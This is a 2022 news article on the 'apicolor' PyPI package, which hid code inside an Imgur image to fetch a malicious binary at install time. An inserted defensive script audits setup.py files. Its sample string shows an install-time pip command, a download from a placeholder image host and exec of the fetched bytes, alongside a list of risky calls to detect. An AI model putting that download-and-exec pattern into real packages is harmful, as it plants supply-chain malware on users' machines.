Friday, November 11, 2022

Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File


A malicious package discovered on the Python Package Index (PyPI) has been found using a steganographic trick to hide malicious code inside image files.

The package in question, named “apicolor,” was uploaded to the Python third-party repository on October 31, 2022, and described as a “Core lib for REST API,” according to Israeli cybersecurity firm Check Point. It has since been taken down.

Apicolor, like other rogue packages detected recently, harbors its malicious behavior in the setup script used to specify metadata associated with the package, such as its dependencies.

This takes the form of a second package called “judyb” as well as a seemingly harmless PNG file (“8F4D2uF.png”) hosted on Imgur, an image-sharing service.


“The judyb code turned out to be a steganography module, responsible [for] hiding and revealing hidden messages inside pictures,” Check Point explained.

The attack chain entails using the judyb package to extract obfuscated Python code embedded within the downloaded image, which, upon decoding, is designed to retrieve and execute a malicious binary from a remote server.
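As a defensive illustration of the install-time behavior described above, the following added example (not Check Point's tooling and not code from the packages involved) parses a setup script without running it and flags dynamic execution, network fetches, image URLs and install-time pip commands. The sample script, its package name and its URL are constructed placeholders, and the list of flagged calls is an assumption chosen for this sketch.

```python
import ast

# Calls that are unusual in a setup script and worth a manual look.
RISKY_CALLS = {"exec", "eval", "compile", "os.system", "subprocess.run",
               "subprocess.Popen", "urllib.request.urlopen", "requests.get"}
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif", ".bmp")


def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join(reversed(parts + [node.id]))
    return None


def audit_setup(source):
    """Parse (never run) setup.py source; return sorted (line, finding)."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and dotted(node.func) in RISKY_CALLS:
            findings.add((node.lineno, "risky call: " + dotted(node.func)))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value.lower()
            if text.startswith(("http://", "https://")):
                is_img = text.split("?")[0].endswith(IMAGE_EXTS)
                findings.add((node.lineno, "image URL" if is_img else "URL"))
            elif "pip install" in text:
                findings.add((node.lineno, "install-time pip command"))
    return sorted(findings)


# Constructed sample, only parsed; package name and URL are placeholders.
SAMPLE = '''\
import os, requests
from setuptools import setup
os.system("pip install stego-helper-placeholder")
blob = requests.get("https://img.example.invalid/abc123.png").content
exec(compile(blob, "<img>", "exec"))
setup(name="demo", version="0.0.1")
'''

if __name__ == "__main__":
    for line, finding in audit_setup(SAMPLE):
        print(f"setup.py:{line}: {finding}")
```

The findings are triage hints rather than verdicts: a plain project URL in the metadata is reported too, so the value lies in seeing several findings cluster in one setup script.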


The development is part of an ongoing trend where threat actors are increasingly setting their sights on the open source ecosystem to exploit the trust associated with third-party software to mount supply chain attacks.

Even more troublingly, such malicious libraries can be incorporated into other open source projects and published on GitHub, effectively broadening the scope and scale of the attacks.

“These findings reflect careful planning and thought by a threat actor, who proves that obfuscation techniques on PyPI have evolved,” the company said.


